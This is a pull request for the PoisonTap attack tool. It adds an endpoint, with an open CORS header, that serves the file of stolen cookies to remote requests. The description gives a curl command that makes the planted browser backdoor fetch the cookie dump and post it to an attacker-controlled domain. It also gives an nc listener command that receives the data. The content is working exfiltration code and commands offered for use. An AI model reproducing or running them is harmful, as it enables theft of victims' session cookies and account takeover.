### PR TITLE
Added the ability to dump the saved cookie file using a remote request

### DIFF
--- a/pi_poisontap.js
+++ b/pi_poisontap.js
@@ -12,6 +12,7 @@ var util = require('util');
 var backdoorPreJs = fs.readFileSync(__dirname + '/target_backdoor.js'); // this gets prepended before legit js, eg jquery.js
 var backdoorHtml = fs.readFileSync(__dirname + '/backdoor.html');
 var log_file = fs.createWriteStream(__dirname + '/poisontap.cookies.log', {flags : 'a'});
+var read_log_file = fs.readFileSync(__dirname + '/poisontap.cookies.log');
 var log_stdout = process.stdout;
 var replacejs = fs.readdirSync(__dirname + '/js');
 var blinked = false;
@@ -71,7 +72,8 @@ var server = http.createServer(function(request, response) {
 		"Server": "PoisonTap/1.0 SamyKamkar/0.1",
 		"Cache-Control": "public, max-age=99936000",
 		"Expires": "Sat, 26 Jul 2040 05:00:00 GMT",
-		"Last-Modified": "Tue, 15 Nov 1994 12:45:26 GMT"
+		"Last-Modified": "Tue, 15 Nov 1994 12:45:26 GMT",
+		"Access-Control-Allow-Origin: *"
 	};
 
 	// cache for a very long time to poison future requests after we're gone
@@ -100,7 +102,17 @@ var server = http.createServer(function(request, response) {
 		response.end();
 		return;
 	}
-
+	
+	// if this is a cookie dump request, return cookie file.  CORS header required to make it work
+	else if (url.indexOf('/PoisonCookieDump') != -1)
+	{
+		console.log('>>> Cookie Dump');
+		response.writeHead(200, headers);
+		response.write(read_log_file);
+		response.end();
+		return;
+	}
+	
   // random AJAX request or load from a page, give our evil content that loads all the backdoors and siphons all the things
 	else
 	{

--- a/pi_poisontap.js
+++ b/pi_poisontap.js
@@ -12,7 +12,6 @@ var util = require('util');
 var backdoorPreJs = fs.readFileSync(__dirname + '/target_backdoor.js'); // this gets prepended before legit js, eg jquery.js
 var backdoorHtml = fs.readFileSync(__dirname + '/backdoor.html');
 var log_file = fs.createWriteStream(__dirname + '/poisontap.cookies.log', {flags : 'a'});
-var read_log_file = fs.readFileSync(__dirname + '/poisontap.cookies.log');
 var log_stdout = process.stdout;
 var replacejs = fs.readdirSync(__dirname + '/js');
 var blinked = false;
@@ -108,7 +107,7 @@ var server = http.createServer(function(request, response) {
 	{
 		console.log('>>> Cookie Dump');
 		response.writeHead(200, headers);
-		response.write(read_log_file);
+		response.write(fs.readFileSync(__dirname + '/poisontap.cookies.log'));
 		response.end();
 		return;
 	}

--- a/pi_poisontap.js
+++ b/pi_poisontap.js
@@ -73,7 +73,7 @@ var server = http.createServer(function(request, response) {
 		"Cache-Control": "public, max-age=99936000",
 		"Expires": "Sat, 26 Jul 2040 05:00:00 GMT",
 		"Last-Modified": "Tue, 15 Nov 1994 12:45:26 GMT",
-		"Access-Control-Allow-Origin: *"
+		"Access-Control-Allow-Origin": "*"
 	};
 
 	// cache for a very long time to poison future requests after we're gone


### PR DESCRIPTION
Added the ability to dump the saved cookie file using a remote request to the backdoor, of the format:

curl 'http://YOUR.DOMAIN:1337/exec?$.get("http://raspberry.local:1337/PoisonCookieDump",function(d)\{$.post("http://YOUR.DOMAIN:1338/cookiedump",d)\})'

Start a listener on your back-end like this:
nc -vvv -k -l 1338